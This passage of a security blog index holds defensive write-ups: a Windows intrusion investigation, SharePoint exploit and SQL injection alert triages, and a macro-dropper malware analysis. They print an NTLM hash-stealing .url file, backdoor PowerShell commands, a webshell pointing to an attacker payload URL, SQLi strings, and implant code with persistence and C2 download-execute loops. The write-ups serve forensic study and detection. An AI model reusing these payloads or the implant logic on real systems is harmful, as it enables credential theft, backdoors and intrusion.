2026","externalUrl":null,"permalink":"/investigations/cdef-hawkeye/","section":"","summary":"A victim host downloaded a HawkEye Keylogger dropper via HTTP, which established persistence, periodically checked the external IP via bot.whatismyipaddress.com, and exfiltrated harvested credentials every 10 minutes over SMTP.","title":"CDEF-HawkEye","type":"investigations"},{"content":"","date":"March 25, 2026","externalUrl":null,"permalink":"/tags/event-viewer/","section":"Tags","summary":"","title":"Event Viewer","type":"tags"},{"content":" Difficulty: Medium OS: Windows Date: 2026-03-25 TL;DR # The threat actor compromised a Windows server by performing a password spraying attack against domain accounts, then planted a malicious Internet Shortcut file (Proposal.url) in a network share to steal the NetNTLM hash of user k.texus via a forced SMB authentication. Using the captured hash, the attacker authenticated via Pass-the-Hash, established an RDP session, exfiltrated sensitive project files (C:\\ProjectArk) as a ZIP archive to C2 server yourc2filemanager.cn, and installed Windows PowerShell Web Access as a persistent backdoor with a newly created local account t.minami.\nInitial Access # The attacker at 6/11/2025 14:35:56 performed a password spraying attack. Password Spraying Attack # Password spraying is a type of brute force attack where an attacker tries a single common password against many different accounts to avoid triggering lockout policies that would occur when brute forcing a single account with many passwords.\nFollowing the 4625 events, I found a corresponding Event ID 4624 with Type 3 (which means connection through network) - at 2025-06-11 14:35:56 the attacker successfully logged into the v.hunter account from 192.168.189.129.\nShared Folder # The attacker accessed a shared folder \u0026ldquo;Proposal\u0026rdquo; configured with Full Control permissions granted to Everyone. The folder is located at:\nC:\\Users\\k.texus\\Desktop\\Project Proposal\nThis shared folder was last modified at 2025-06-11 14:39:20 and contains two files.\nnewproposal.txt contains a phishing message with an email address pointing to the @project.ark domain:\n1Greeting project manager! your contractor here! I have made a new proposal 2for our project and you can click another file on this folder to go directly 3to my private website! If you have any question regarding this proposal, 4please send it to argonaut@project.ark NTLM Hash Stealing # The second file, Proposal.url, is a malicious Internet Shortcut crafted for NetNTLM hash theft:\n1[InternetShortcut] 2URL=http://argonaut.ark/proposal.html 3WorkingDirectory=C:\\Users\\ 4IconFile=\\\\192.168.189.129\\%USERNAME%.icon 5IconIndex=1 This file does not require the victim to execute it. The attack triggers automatically when a user opens the \u0026ldquo;Proposal\u0026rdquo; folder in Windows Explorer. The IconFile parameter forces Windows to fetch the icon from the attacker\u0026rsquo;s SMB share at \\\\192.168.189.129. During this request, Windows automatically performs NTLM authentication and transmits the victim\u0026rsquo;s NetNTLM hash to the attacker\u0026rsquo;s server. The use of %USERNAME% in the path allows the attacker to identify exactly which account\u0026rsquo;s credentials were captured.\nAt 2025-06-11 14:41:38 the user k.texus opened the folder, triggering the hash leak.\nAt 2025-06-11 14:42:57 the attacker authenticated as k.texus using the captured NTLM hash (Pass-the-Hash).\nAt 2025-06-11 14:44:48 the attacker connected via RDP using the compromised account.\nExfiltration # To understand what the attacker did during the RDP session, I analyzed the Microsoft Edge browser history of k.texus using a SQLite viewer on the History database file. The urls table revealed the attacker\u0026rsquo;s activity chronologically:\nThe attacker searched for and visited 7-zip.org to download the archiving tool, then accessed http://localhost/ - the ProjectArk web application running locally on the server. After that, the browser history shows visits to http://yourc2filemanager.cn/ and http://yourc2filemanager.cn/upload.php, confirming the upload of the exfiltrated archive to the C2 server.\nTo confirm what was archived and when, I used MFTECmd to parse the NTFS $J journal, which logs all file system operations. Filtering by the C:\\ProjectArk path revealed:\nAt 2025-06-11 14:46:42 the attacker created arkproj.zip containing the contents of C:\\ProjectArk. The total size of exfiltrated files was 783,907 bytes. At 2025-06-11 14:46:44 the archive was exfiltrated to the C2 server yourc2filemanager.cn.\nBackdoor Installation # To find post-exfiltration activity, I examined the PowerShell event logs Windows PowerShell.evtx - in Event Viewer. However, the most direct evidence came from ConsoleHost_history.txt of user k.texus which stores a history of all PowerShell commands entered interactively. The file revealed the full sequence of commands executed by the attacker:\n1Install-WindowsFeature -Name WindowsPowerShellWebAccess -IncludeManagementTools 2Install-PswaWebApplication -UseTestCertificate 3Add-PswaAuthorizationRule -UserName * -ComputerName * -ConfigurationName * 4Enable-PSRemoting -Force 5Test-WSMan 6Get-Service -Name WinRM 7net localgroup \u0026#34;remote management users\u0026#34; t.minami /add 8net user t.minami After exfiltration, the attacker installed Windows PowerShell Web Access (PSWA) as a web-based backdoor to maintain persistent access to the server. PSWA provides a browser-based interface for executing PowerShell commands remotely over the WinRM protocol. The rule Add-PswaAuthorizationRule -UserName * -ComputerName * -ConfigurationName * grants unrestricted access - any user can connect to any host with any configuration.\nPersistence # To maintain persistence, the attacker created a local user t.minami and added it to the Remote Management Users group, enabling WinRM/PSWA authentication independently of the compromised accounts.\nTo confirm that the backdoor was actually used, I examined the IIS logs located at \\inetpub\\logs\\LogFiles\\W3SVC1. IIS is the Windows web server that hosts the PSWA web interface - it logs every HTTP request made to it, including the authenticated username, source IP, HTTP method, and response code. The logs confirmed a successful login and session establishment at 2025-06-11 14:54:55:\n12025-06-11 14:54:55 POST /pswa/en-US/logon.aspx ... 192.168.189.129 ... 302 0 0 5389 22025-06-11 14:54:55 GET /pswa/ ... LIBERYSV08\\t.minami 192.168.189.129 ... 302 0 0 58 32025-06-11 14:54:55 GET /pswa/en-US/console.aspx ... LIBERYSV08\\t.minami 192.168.189.129 ... 200 0 0 176 The POST to logon.aspx is the login request. The subsequent GET /pswa/en-US/console.aspx returning HTTP 200 confirms the attacker successfully authenticated and reached the interactive PowerShell console. The authenticated username LIBERYSV08\\t.minami and source IP 192.168.189.129 match the backdoor account and attacker IP identified earlier.\nSession ID: LIBERYSV08\\t.minami.250611.075455 Session terminated at 2025-06-11 14:55:40.\nThe attacker also created a network share ProjectArk for potential lateral movement.\nIOCs # IPs\n- 192.168.189.129 - attacker IP (password spray, SMB hash capture, RDP, PSWA)\nDomains\n- yourc2filemanager.cn - C2 exfiltration server\n- argonaut.ark / project.ark - phishing domains used in lure documents\nFiles\n- C:\\Users\\k.texus\\Desktop\\Project Proposal\\Proposal.url - malicious Internet Shortcut for NTLM hash theft\n- C:\\Users\\k.texus\\Desktop\\Project Proposal\\newproposal.txt - phishing lure document\n- arkproj.zip - exfiltrated archive (783,907 bytes)\nPaths\n- C:\\ProjectArk - source folder of exfiltrated data\nAccounts\n- v.hunter - compromised via password spraying\n- k.texus - compromised via Pass-the-Hash\n- t.minami - backdoor account created by threat actor\nFeatures / Protocols\n- WindowsPowerShellWebAccess - installed as backdoor web gateway\n- WinRM - enabled for persistent remote access\nRecommendations # Immediate Actions\nRemove backdoor account t.minami and audit all local users on the server Uninstall PSWA and disable WinRM if not required Reset passwords for all compromised accounts: v.hunter, k.texus Block IP 192.168.189.129 and domain yourc2filemanager.cn at the network perimeter Audit all files accessed or copied during the RDP session on 2025-06-11 Preventive Measures\nRestrict share permissions - remove Full Control for the Everyone group on all shares Enable SMB signing to prevent NTLM relay and Pass-the-Hash attacks Deploy detection rules for Internet Shortcut files with IconFile pointing to external UNC paths Enforce account lockout policies to mitigate password spraying Enable MFA on RDP and all remote access solutions Monitor for PSWA and WinRM installation events via SIEM Attack Timeline # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef access fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef action fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef exfil fill:#fce4ec,stroke:#880e4f,stroke-width:2px,color:#000; classDef persist fill:#f3e5f5,stroke:#6a1b9a,stroke-width:2px,color:#000; classDef start fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px,color:#000; A([\"192.168.189.129Threat Actor\"]):::start --\u003e B[\"14:35:56Password Sprayingv.hunter compromised\"]:::access B --\u003e C[\"14:39:20Proposal share accessedProposal.url + newproposal.txt planted\"]:::action C --\u003e D[\"14:41:38k.texus opens Proposal folderNetNTLM hash automatically sent to attacker\"]:::action D --\u003e E[\"14:42:57Pass-the-HashAuthenticated as k.texus\"]:::access E --\u003e F[\"14:44:48RDP session establishedunder k.texus account\"]:::access subgraph Exfiltration [Exfiltration] F --\u003e G[\"14:46:42arkproj.zip createdC:\\ProjectArk - 783,907 bytes\"]:::exfil G --\u003e H[\"14:46:44arkproj.zip uploadedyourc2filemanager.cn\"]:::exfil end subgraph Persistence [Persistence] H --\u003e I[\"~14:50PSWA installedWinRM enabled\"]:::persist I --\u003e J[\"~14:50Local user t.minami createdAdded to Remote Management Users\"]:::persist J --\u003e K[\"14:54:55Backdoor access confirmedt.minami via PSWA\"]:::persist K --\u003e L([\"14:55:40Session terminatedLIBERYSV08\\t.minami.250611.075455\"]):::persist end ","date":"March 25, 2026","externalUrl":null,"permalink":"/investigations/htb-liberty/","section":"","summary":"Password spraying led to domain account compromise, followed by NetNTLM hash theft via a malicious .url file, RDP access, data exfiltration to a C2 server, and PSWA backdoor installation for persistence.","title":"HTB-Liberty","type":"investigations"},{"content":"","date":"March 25, 2026","externalUrl":null,"permalink":"/tags/mftexplorer/","section":"Tags","summary":"","title":"MFTExplorer","type":"tags"},{"content":"","date":"March 25, 2026","externalUrl":null,"permalink":"/tags/smtp/","section":"Tags","summary":"","title":"SMTP","type":"tags"},{"content":"","date":"March 22, 2026","externalUrl":null,"permalink":"/tags/cve-2025-53770/","section":"Tags","summary":"","title":"CVE-2025-53770","type":"tags"},{"content":" Alert # 1EventID: 320 2Severity: Critical 3Event Time: Jul, 22, 2025, 01:07 PM 4Rule: SOC342 - CVE-2025-53770 SharePoint ToolShell Auth Bypass and RCE 5Level: Security Analyst 6Hostname: SharePoint01 7Source IP Address: 107.191.58.76 8Destination IP Address: 172.16.20.17 9HTTP Request Method: POST 10Requested URL: /_layouts/15/ToolPane.aspx?DisplayMode=Edit\u0026amp;a=/ToolPane.aspx 11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 12Referer: /_layouts/SignOut.aspx 13Content-Length: 7699 14Alert Trigger Reason: Suspicious unauthenticated POST request targeting ToolPane.aspx with large payload size and spoofed referer indicative of CVE-2025-53770 exploitation. 15Device Action: Allowed CVE-2025-53770 # CVE-2025-53770 is a critical vulnerability in Microsoft SharePoint Server caused by unsafe deserialization of .NET objects. It allows an unauthenticated attacker with network access to upload a serialized .NET object to the server and achieve remote code execution without any credentials.\nIdentification # Is the traffic coming from outside? # The source IP 107.191.58.76 is an external address. Traffic direction is Internet to Company Network.\nShodan identifies the IP as belonging to Vultr Holdings, LLC (AS20473, Los Angeles, California). The hostname resolves to 107.191.58.76.vultrusercontent.com Is the source malicious? # AbuseIPDB shows the IP has been reported 26 times, with a 0% Confidence of Abuse score. Despite the low confidence, the VPS hosting context and report history are consistent with attacker-controlled infrastructure.\nVirusTotal flagged the IP as malicious by 10/94 vendors\nWhat type of attack was attempted? # Reviewing the proxy log, a single POST request was sent from 107.191.58.76:25332 to 172.16.20.17:443 at 13:07 PM targeting /_layouts/15/ToolPane.aspx. The request carried a 7699 byte body and used a spoofed Referer: /_layouts/SignOut.aspx - a characteristic of CVE-2025-53770 exploitation.\nDid anyone else get targeted? # Log review shows all malicious activity targeted exclusively 172.16.20.17` (SharePoint01). No other internal hosts were involved.\nDid the attack succeed? # Yes. The endpoint terminal history confirms full RCE was achieved immediately after the exploit request:\n1Jul 22 2025 13:07:24 2powershell.exe -nop -w hidden -e PCVAIEltcG9ydC... The base64-encoded payload decodes to an ASPX page that uses reflection to invoke MachineKeySection.GetApplicationConfig() and write the server\u0026rsquo;s ValidationKey, DecryptionKey, and related fields to the HTTP response.\n1Jul 22 2025 13:07:27 2csc.exe /out:C:\\Windows\\Temp\\payload.exe C:\\Windows\\Temp\\payload.cs The C# compiler was invoked to compile a custom payload from`payload.cs into C:\\Windows\\Temp\\payload.exe.\n1Jul 22 2025 13:07:29 2cmd.exe /c echo \u0026lt;form runat=\u0026#34;server\u0026#34;\u0026gt;\u0026lt;object classid=\u0026#34;clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11\u0026#34;\u0026gt; 3\u0026lt;param name=\u0026#34;Command\u0026#34; value=\u0026#34;Redirect\u0026#34;\u0026gt;\u0026lt;param name=\u0026#34;Button\u0026#34; value=\u0026#34;Test\u0026#34;\u0026gt; 4\u0026lt;param name=\u0026#34;Url\u0026#34; value=\u0026#34;http://107.191.58.76/payload.exe\u0026#34;\u0026gt;\u0026lt;/object\u0026gt;\u0026lt;/form\u0026gt; 5\u0026gt; C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\16\\TEMPLATE\\LAYOUTS\\spinstall0.aspx A webshell (spinstall0.aspx) was written directly into the SharePoint layouts directory. The webshell contains an ActiveX object that redirects to http://107.191.58.76/payload.exe, enabling the attacker to trigger payload download.\n1Jul 22 2025 13:07:34 2powershell.exe -Command \u0026#34;[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()\u0026#34; At 13:08:04 the SharePoint01 endpoint initiated an outbound connection to 107.191.58.76 - successful reverse callback or payload download.\nTriage Decision # What is the impact level? # The attack fully succeeded. The attacker achieved unauthenticated RCE on SharePoint01, extracted the server\u0026rsquo;s MachineKey, compiled and staged a malicious executable, planted a persistent webshell at a publicly accessible path, and established an active outbound connection to the attacker\u0026rsquo;s C2 at 107.191.58.76. The endpoint is fully compromised. Escalated to Tier 2.\nContainment # Is the attacker still active? # Source IP 107.191.58.76 need to be blocked at the WAF and firewall\nIs the vulnerable endpoint still exposed? # The /_layouts/15/ToolPane.aspx endpoint need to be disabled and patched\nIOCs # Type Value Source IP 107.191.58[.]76 Proxy / firewall logs Domain vultrusercontent[.]com Shodan URL hxxps://172.16.20[.]17/_layouts/15/ToolPane.aspx?DisplayMode=Edit\u0026amp;a=/ToolPane.aspx Proxy log URL hxxp://107.191.58[.]76/payload.exe Webshell content File spinstall0.aspx SharePoint layouts directory File C:\\Windows\\Temp\\payload.exe File C:\\Windows\\Temp\\payload.cs ","date":"March 22, 2026","externalUrl":null,"permalink":"/blue_team/ld-cve202553770-sharepoint-toolshell-auth-bypass-and-rce/","section":"","summary":"An attacker exploited CVE-2025-53770 against a SharePoint server, achieving unauthenticated RCE via .NET deserialization. The attacker extracted the MachineKey, compiled and dropped a payload, planted a webshell in the SharePoint layouts directory, and established a reverse connection to the attacker-controlled server.","title":"LD-CVE-2025-53770 SharePoint ToolShell Auth Bypass and RCE","type":"blue_team"},{"content":" Alert # 1EventID: 115 2Severity: High 3Event Time: Feb, 25, 2022, 11:34 AM 4Rule: SOC165 - Possible SQL Injection Payload Detected 5Hostname: WebServer1001 6Destination IP Address: 172.16.17.18 7Source IP Address: 167.99.169.17 8HTTP Request Method: GET 9Requested URL: https://172.16.17.18/search/?q=%22%20OR%201%20%3D%201%20--%20- 10User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1 11Alert Trigger Reason: Requested URL Contains OR 1 = 1 12Device Action: Allowed Identification # Is the traffic coming from outside? # The source IP 167.99.169.17 is hosted on DigitalOcean (AS14061, Santa Clara, US). Shodan associates it with domains ecreaup.com and ecreaup.pro, tagged as cloud and eol-product. The IP does not belong to the internal network range - traffic direction is confirmed as Internet to company network.\nIs the source malicious? # AbuseIPDB shows the IP has been reported 14,839 times, however the Confidence of Abuse score is 0%, which can occur when reports are old or unverified. Despite the low confidence score, the volume of historical reports and the DigitalOcean VPS hosting context are consistent with attacker infrastructure.\nVirusTotal flagged the IP as malicious by 3/94 vendors. The low detection count combined with the AbuseIPDB history suggests this IP has been used for multiple abuse campaigns over time.\nWhat type of attack was attempted? # Reviewing the firewall logs, I observed multiple inbound connections from 167.99.169.17 to 172.16.17.18 on port 443 between 11:30 AM and 11:34 AM, all logged as permitted.\nExamining the full request log, the attacker targeted the /search/ endpoint with a series of classic SQL injection payloads delivered via the q GET parameter:\n1https://172.16.17.18/search/?q=\u0026#39; OR \u0026#39;1 2https://172.16.17.18/search/?q=\u0026#39; 3https://172.16.17.18/search/?q=\u0026#39; OR \u0026#39;x\u0026#39;=\u0026#39;x 4https://172.16.17.18/search/?q=1\u0026#39; ORDER BY 3--+ 5https://172.16.17.18/search/?q=\u0026#34; OR 1 = 1 -- - Did anyone else get targeted? # Log review shows all requests from 167.99.169.17 targeted exclusively 172.16.17.18 on the /search/ endpoint on WebServer1001. No other internal hosts were targeted during this timeframe.\nDid the attack succeed? # No. Every SQL injection request returned HTTP 500 Internal Server Error with a response size of 948 bytes, consistent with a generic error page. No successful data extraction or authentication bypass was observed.\nTriage Decision # What is the impact level? # The attacker probed the /search/ endpoint with multiple SQL injection payloads. All requests returned HTTP 500 - the application crashed on the input but did not expose data. The attack was malicious and intentional but did not succeed. No escalation to L2 is required. Containment actions and WAF rule updates are sufficient.\nContainment # Is the attacker still active? # The last observed request from 167.99.169.17 was at 11:34 AM. No further connections were observed after that timestamp in the firewall logs.\nIs the vulnerable endpoint still exposed? # The /search/ endpoint on 172.16.17.18 remains exposed and appears to pass unsanitized input to the backend, as evidenced by the HTTP 500 responses to SQLi payloads. Input validation and parameterized queries should be reviewed immediately.\nIs the web server still compromised? # No compromise was achieved. The server returned errors on all injection attempts and no successful response (HTTP 200 with data) was observed. Source IP 167.99.169.17 was blocked at the firewall.\nIOCs # Type Value Source Blocked IP 167.99.169[.]17 Firewall / WAF logs Yes URL hxxps://172.16.17[.]18/search/?q=%22%20OR%201%20%3D%201%20--%20- WAF alert Yes Domain ecreaup[.]com Shodan / AbuseIPDB Yes Domain ecreaup[.]pro Shodan / AbuseIPDB Yes ","date":"March 22, 2026","externalUrl":null,"permalink":"/blue_team/ld-possible-sql-injection-payload-detected/","section":"","summary":"An external IP hosted on DigitalOcean performed a manual SQL injection reconnaissance against an internal web server, cycling through classic SQLi payloads. All requests returned HTTP 500, confirming the attack did not succeed.","title":"LD-Possible SQL Injection Payload Detected","type":"blue_team"},{"content":"","date":"March 22, 2026","externalUrl":null,"permalink":"/tags/sharepoint/","section":"Tags","summary":"","title":"SharePoint","type":"tags"},{"content":" Difficulty: Medium OS: Windows Date: 2026-03-18 TL;DR # A malicious Word document executes a password-protected VBA macro on open, which drops and runs maintools.js with the passphrase EzZETcSXyKAdF_e5I2i1. The script Base64-decodes and RC4-decrypts an embedded blob into stage2.js — a full implant that copies itself to AppData, registers a hidden logon scheduled task named TaskManager, runs 22 recon commands, and enters an infinite loop beaconing to two compromised WordPress sites. On a \u0026quot;work\u0026quot; response from the C2, it downloads, decrypts, and executes a next-stage .pif binary, then deletes it after 30 seconds.\nInitial Analysis # 1MD5: 49b367ac261a722a7c2bbbc328c32545 2SHA256: ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751 3 4Composite Document File V2 Document, Little Endian 5OS: Windows, Version 6.1, Code page: 1252 6Author: user — Last Saved By: John 7Created: Fri Nov 25 19:04:00 2016 8Last Saved: Fri Nov 25 20:04:00 2016 9Revision: 11, Pages: 1, Words: 320, Characters: 1828 10Creating Application: Microsoft Office Word 11Total Editing Time: 08:00 olevba # olevba extracted the full VBA source. The macro defines two auto-execution triggers — AutoOpen and AutoClose — and employs several suspicious primitives: file I/O via Open, Put, and Binary; process execution via Shell, WScript.Shell, and Run; OLE object creation via CreateObject; XOR-based string obfuscation; and embedded Base64 strings. The only identified IOC is the filename maintools.js.\n1+----------+--------------------+---------------------------------------------+ 2|Type |Keyword |Description | 3+----------+--------------------+---------------------------------------------+ 4|AutoExec |AutoOpen |Runs when the Word document is opened | 5|AutoExec |AutoClose |Runs when the Word document is closed | 6|Suspicious|Environ |May read system environment variables | 7|Suspicious|Open |May open a file | 8|Suspicious|Put |May write to a file (if combined with Open) | 9|Suspicious|Binary |May read or write a binary file | 10|Suspicious|Kill |May delete a file | 11|Suspicious|Shell |May run an executable file or a system cmd | 12|Suspicious|WScript.Shell |May run an executable file or a system cmd | 13|Suspicious|Run |May run an executable file or a system cmd | 14|Suspicious|CreateObject |May create an OLE object | 15|Suspicious|Windows |May enumerate application windows | 16|Suspicious|Xor |May attempt to obfuscate specific strings | 17|Suspicious|Base64 Strings |Base64-encoded strings detected | 18|IOC |maintools.js |Executable file name | 19+----------+--------------------+---------------------------------------------+ VBA analysis # Bypassing password protection # The macro creates a WScript.Shell object via CreateObject, writes an embedded payload to disk as maintools.js, and executes it using the .Run method with a decryption key passed as a command-line argument. I opened the document and accessed the VBA editor via ALT+F11, to inspect the macro source without triggering execution. The VBA project was password-protected.\nI opened the document in HxD Hex Editor and patched the protection flag from DPB= to DPx=, invalidating the password hash.\nReopening the document raised error #40230, which I dismissed. I then opened the project properties and set a new password, restoring full access to the macro source for modification and debugging.\nExtracting payload from VBA # I commented out the .Run call and replaced it with a MsgBox statement, to surface the resolved payload path without triggering execution:\n1\u0026#39; R66BpJMgxXBo2h.Run \u0026#34;\u0026#34;\u0026#34;\u0026#34; + OBKHLrC3vEDjVL + \u0026#34;\u0026#34;\u0026#34;\u0026#34; + \u0026#34; EzZETcSXyKAdF_e5I2i1\u0026#34; 2MsgBox \u0026#34;Path: \u0026#34; \u0026amp; OBKHLrC3vEDjVL maintools.js # The script decrypts the embedded payload using CpPT(key, data). The decryption key is the first argument passed from the VBA shell call: EzZETcSXyKAdF_e5I2i1. The decrypted payload is then executed directly in memory via eval():\n1R66BpJMgxXBo2h.Run \u0026#34;\u0026#34;\u0026#34;\u0026#34; + OBKHLrC3vEDjVL + \u0026#34;\u0026#34;\u0026#34;\u0026#34; + \u0026#34; EzZETcSXyKAdF_e5I2i1\u0026#34; 1try { 2 var wvy1 = WScript.Arguments; 3 var ssWZ = wvy1(0); // key = \u0026#34;EzZETcSXyKAdF_e5I2i1\u0026#34; 4 var mw_payload = y3zb(); // retrieve encrypted blob 5 mw_payload = LXv5(mw_payload); // base64 decode 6 mw_payload = CpPT(ssWZ, mw_payload); // decrypt 7 eval(mw_payload); // execute 8} catch (e) { 9 WScript.Quit(); 10} 11 12function LXv5(d27x) { 13 var LUK7 = \u0026#34;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\u0026#34;; 14 //...[snip]... 15} 16 17function CpPT(bOe3, F5vZ) { // decryption 18 var AWy7 = []; 19 var V2Vl = 0; 20 for (var i = 0; i \u0026lt; 256; i++) { AWy7[i] = i; } 21 for (var i = 0; i \u0026lt; 256; i++) { 22 V2Vl = (V2Vl + AWy7[i] + bOe3.charCodeAt(i % bOe3.length)) % 256; 23 //...[snip]... 24} 25 26function y3zb() { // encrypted payload blob 27 var qGxZ = \u0026#34;zAubgpaJRj0...\u0026#34; 28 return qGxZ; 29} controlled execution # To extract payload I modified the main logic - replaced WScript.Arguments with the hardcoded passphrase, removed eval(), and added fs.writeFileSync to write the decrypted result to disk as stage2.js:\n1try { 2 var ssWZ = \u0026#39;EzZETcSXyKAdF_e5I2i1\u0026#39;; 3 var mw_payload = y3zb(); 4 mw_payload = LXv5(mw_payload); 5 mw_payload = CpPT(ssWZ, mw_payload); 6 const fs = require(\u0026#39;fs\u0026#39;); 7 fs.writeFileSync(\u0026#39;stage2.js\u0026#39;, mw_payload); 8 console.log(\u0026#39;done.\u0026#39;); 9} catch (e) { 10 WScript.Quit(); 11} I executed the modified script and received stage2.js on disk.\nstage2.js # Initialization # It was heavily obfuscated, like the previous stage. I applied a JS beautifier to the output and started analysis.\nAt the top of the script several variables are declared. The variable urls contains two URLs — likely C2 endpoints hosted on compromised WordPress sites. The variable commnds_for_info_gath is an array of 22 shell commands used for system reconnaissance. Then the script calls TfOh(), which captures the victim\u0026rsquo;s username via WScript.Network and generates a random string, likely used as a session identifier for C2 communication.\n1var urls = new Array(\u0026#34;http://www.saipadiesel124.com/wp-content/plugins/imsanity/tmp.php\u0026#34;, \u0026#34;http://www.folk-cantabria.com/wp-content/plugins/wp-statistics/includes/classes/gallery_create_page_field.php\u0026#34;); 2var tpO8 = \u0026#34;w3LxnRSbJcqf8HrU\u0026#34;; 3var commnds_for_info_gath = new Array(\u0026#34;systeminfo \u0026gt; \u0026#34;, \u0026#34;net view \u0026gt;\u0026gt; \u0026#34;...); 4var QUjy = new ActiveXObject(\u0026#34;Scripting.FileSystemObject\u0026#34;); 5var LIxF = WScript.ScriptName; 6var w5mY_username = \u0026#34;\u0026#34;; Persistence # The main block starts by resolving the drop path via Blgx(), which receives a WScript.Shell object from bIdG(). Blgx() then selects a writable directory for file operations, preferring AppData\\Local\\Microsoft\\Windows\\, falling back to Temp, and then the legacy Application Data path if neither exists.\n1var wyKN_filepath = Blgx(bIdG()); 2try { 3 var WE86 = bIdG(); 4 rGcR(); 5 jSm8(); 6} catch (e) { 7 WScript.Quit(); 8} 9//...[snip]... 10function Blgx(gaWo) { 11 wyKN_filepath = \u0026#34;c:\\Users\\\\\u0026#34; + w5mY_username + \u0026#34;\\AppData\\Local\\Microsoft\\Windows\\\u0026#34;; 12 if (!QUjy.FOLDEREXISTS(wyKN_filepath)) 13 wyKN_filepath = \u0026#34;c:\\Users\\\u0026#34; + w5mY_username + \u0026#34;\\AppData\\Local\\Temp\\\u0026#34;; 14 if (!QUjy.FOLDEREXISTS(wyKN_filepath)) 15 wyKN_filepath = \u0026#34;c:\\Documents and Settings\\\u0026#34; + w5mY_username + \u0026#34;\\Application Data\\Microsoft\\Windows\\\u0026#34;; 16 return wyKN_filepath 17} After the path is resolved, rGcR() is called for persistence. It copies the script to the drop path and registers a hidden scheduled task named TaskManager under the display name Windows Task Manager to blend with legitimate system tasks. The task triggers on user logon and executes the dropped script with the passphrase EzZETcSXyKAdF_e5I2i1 as an argument.\n1function rGcR() { 2 v_FileName = wyKN_filepath + LIxF.substring(0, LIxF.length - 2) + \u0026#34;js\u0026#34;; 3 QUjy.COPYFILE(WScript.ScriptFullName, wyKN_filepath + LIxF); 4 var HFp7 = (Math.random() * 150 + 350) * 1000; 5 WScript.Sleep(HFp7); 6 eV_C(\u0026#34;TaskManager\u0026#34;, \u0026#34;Windows Task Manager\u0026#34;, w5mY_username, v_FileName, \u0026#34;EzZETcSXyKAdF_e5I2i1\u0026#34;, wyKN_filepath, true); 7} С2 loop # After persistence is established, jSm8() starts the main C2 loop.\nIt first calls Fv6b() to collect and encrypt system reconnaissance data, then enters an infinite loop that iterates over both C2 URLs, sending the data and processing the server\u0026rsquo;s response. Fv6b() runs all 22 recon commands via cmd.exe, appending their output to a temp file ~dat.tmp. The file is then read and passed through the encryption function from with the hardcoded key 2f532d6baec3d0ec7b1f98aed4774843. After each full iteration the script sleeps for a random interval between 1 and 1.5 hours.\n1function jSm8() { 2 var enc_info = Fv6b(); 3 while (true) { 4 for (var i = 0; i \u0026lt; urls.length; i++) { 5 var each_url = urls[i]; 6 var f3cb = XEWG(each_url, enc_info); 7 switch (f3cb) { 8 case \u0026#34;good\u0026#34;: break; 9 case \u0026#34;exit\u0026#34;: WScript.Quit(); break; 10 case \u0026#34;work\u0026#34;: XBL3(each_url); break; 11 case \u0026#34;fail\u0026#34;: tbMu(); break; 12 } 13 TfOh(); 14 } 15 WScript.Sleep((Math.random() * 300 + 3600) * 1000); 16 } 17} 18//...[snip]... 19function Fv6b() { 20 var infofile = wyKN_filepath + \u0026#34;~dat.tmp\u0026#34;; 21 for (var i = 0; i \u0026lt; commnds_for_info_gath.length; i++) { 22 WE86.Run(\u0026#34;cmd.exe /c \u0026#34; + commnds_for_info_gath[i] + \u0026#34;\\\u0026#34;\u0026#34; + infofile + \u0026#34;\\\u0026#34;\u0026#34;, 0, true); 23 } 24 var nRVN = UspD(infofile); 25 WScript.Sleep(1000); 26 QUjy.DELETEFILE(infofile); 27 return FXx9(\u0026#34;2f532d6baec3d0ec7b1f98aed4774843\u0026#34;, nRVN); 28} XEWG() sends the encrypted recon data to the C2 via HTTP POST. The server response text is returned and controls the switch in jSm8().\n1function XEWG(url, data) { 2 var Kpxo = new ActiveXObject(\u0026#34;MSXML2.XMLHTTP\u0026#34;); 3 Kpxo.OPEN(\u0026#34;post\u0026#34;, url, false); 4 Kpxo.SETREQUESTHEADER(\u0026#34;user-agent:\u0026#34;, \u0026#34;Mozilla/5.0 (Windows NT 6.1; Win64; x64); \u0026#34; + Sz8k()); 5 Kpxo.SETREQUESTHEADER(\u0026#34;content-type:\u0026#34;, \u0026#34;application/octet-stream\u0026#34;); 6 var rRi3 = hLit(data, true); 7 Kpxo.SETREQUESTHEADER(\u0026#34;content-length:\u0026#34;, rRi3.length); 8 Kpxo.SEND(rRi3); 9 return Kpxo.responseText; 10} On a \u0026quot;work\u0026quot; response, XBL3() is called. It sends a POST request with the body \u0026quot;work\u0026quot; to the C2 and downloads a binary payload from the response. The payload is decrypted with FXx9() using the same key 2f532d6baec3d0ec7b1f98aed4774843, written to disk as a .pif file, and executed. After 30 seconds the file is deleted.\n1function XBL3(url) { 2 var pif_filename = wyKN_filepath + LIxF.substring(0, LIxF.length - 2) + \u0026#34;pif\u0026#34;; 3 var Kpxo = new ActiveXObject(\u0026#34;MSXML2.XMLHTTP\u0026#34;); 4 Kpxo.OPEN(\u0026#34;post\u0026#34;, url, false); 5 Kpxo.SETREQUESTHEADER(\u0026#34;content-length:\u0026#34;, \u0026#34;4\u0026#34;); 6 Kpxo.SEND(\u0026#34;work\u0026#34;); 7 if (Kpxo.STATUS == 200) { 8 var c0xi = m3mH.ReadText(m3mH.Size); 9 var ptF0 = FXx9(\u0026#34;2f532d6baec3d0ec7b1f98aed4774843\u0026#34;, cz_b(c0xi)); 10 NoRS(ptF0, pif_filename); // write to disk 11 } 12 c5ae(pif_filename, url); // execute 13 WScript.Sleep(30000); 14 QUjy.DELETEFILE(pif_filename); 15} IOCs # Files\n- maintools.js — first-stage JS payload dropped by VBA 